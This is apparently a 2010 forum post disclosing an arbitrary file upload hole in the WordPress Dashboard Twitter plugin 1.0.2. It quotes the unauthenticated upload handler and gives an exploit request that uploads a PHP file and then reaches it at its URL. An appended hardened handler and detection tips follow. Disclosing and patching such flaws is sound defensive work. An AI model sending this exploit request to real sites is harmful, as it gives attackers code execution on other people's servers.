10.10.2010, 18:45   #22
RulleR

Registered: 04.07.2010
Posts: 39
Reputation: 58
WordPress Plugin [WordPress Dashboard Twitter] Arbitrary File Upload Vulnerability

Plugin name: WordPress Dashboard Twitter (download)
Version: 1.0.2

Arbitrary File Upload

Vuln file: /wp-content/plugins/wordpress-dashboard-twitter/inc/upload.func.php
PHP code:
<?php
switch ( $_GET['action'] ) {
    case 'upload-image':
        // Bootstraps WordPress but never checks who is calling:
        // no login check, no capability check, no nonce.
        require_once( '../../../../wp-load.php' );

        $uploaddir  = str_replace( 'inc/', '', dirname( __FILE__ ) . '/uploads/' );
        // Only the name is made unique; extension and content are never validated.
        $uploadfile = $uploaddir . wp_unique_filename( $uploaddir, $_FILES['userfile']['name'] );

        if ( move_uploaded_file( $_FILES['userfile']['tmp_name'], $uploadfile ) ) {
            echo "Uploaded.";
        } else {}
        break;
}
?>
Exploit:
Code:
POST http://[host]/[path]/wp-content/plugins/wordpress-dashboard-twitter/inc/upload.func.php?action=upload-image HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8343976828233

-----------------------------8343976828233
Content-Disposition: form-data; name="userfile"; filename="thumb.php"
Content-Type: application/vcard

<?php
echo 'test';
?>
-----------------------------8343976828233
http://[host]/[path]/wp-content/plugins/wordpress-dashboard-twitter/uploads/thumb.php
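A hardened replacement for the handler shown in the post, added here as an example; it is not the plugin's code and not part of the original post. It uses standard WordPress APIs and assumes it is loaded as part of a plugin and reached through wp-admin/admin-ajax.php, so wp-load.php is never required directly. The AJAX action name wdt_upload_image, the nonce action and the function name are assumptions:

```php
<?php
// Added example: hardened upload handler (assumed names, not the plugin's own).
// Only the authenticated hook is registered; with no 'wp_ajax_nopriv_' hook,
// anonymous requests never reach the handler at all.
add_action( 'wp_ajax_wdt_upload_image', 'wdt_handle_upload_image' );

function wdt_handle_upload_image() {
    // 1. Authorization: the original file runs for anyone who can reach it.
    //    Require a logged-in user with the upload_files capability.
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( 'Insufficient permissions.', 403 );
    }

    // 2. CSRF: the request must carry a nonce tied to this action
    //    (generated with wp_create_nonce( 'wdt_upload_image' ) on the form).
    check_ajax_referer( 'wdt_upload_image', '_wpnonce' );

    // 3. Basic sanity of the upload itself.
    if ( empty( $_FILES['userfile'] )
        || UPLOAD_ERR_OK !== $_FILES['userfile']['error']
        || ! is_uploaded_file( $_FILES['userfile']['tmp_name'] ) ) {
        wp_send_json_error( 'No file uploaded.', 400 );
    }
    $file = $_FILES['userfile'];

    // 4. Content validation: extension and detected MIME type must agree and
    //    be on a short allowlist of raster images. The client-supplied
    //    Content-Type header is ignored entirely; a "thumb.php" name, or a
    //    PHP payload behind an image extension, fails this check.
    $allowed_mimes = array(
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'gif'      => 'image/gif',
    );
    $check = wp_check_filetype_and_ext( $file['tmp_name'], $file['name'], $allowed_mimes );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        wp_send_json_error( 'Only JPEG, PNG or GIF images are accepted.', 415 );
    }

    // 5. Let core move the file: it sanitizes the name, picks a unique
    //    filename and places it under the configured uploads directory
    //    instead of a path computed from __FILE__.
    require_once ABSPATH . 'wp-admin/includes/file.php';
    $result = wp_handle_upload( $file, array(
        'test_form' => false,
        'mimes'     => $allowed_mimes,
    ) );
    if ( isset( $result['error'] ) ) {
        wp_send_json_error( $result['error'], 500 );
    }

    wp_send_json_success( array( 'url' => $result['url'] ) );
}
```

The dashboard form posts to admin-ajax.php with `action=wdt_upload_image` and a `_wpnonce` field; each `wp_send_json_error` call ends the request, so the move only happens once every check has passed. Independently of the code fix, serving the plugin's uploads/ directory with script execution disabled at the web-server level limits the impact of any upload bug of this kind, and a POST to an upload endpoint followed by a GET for a .php file under uploads/ is the access-log pattern worth alerting on.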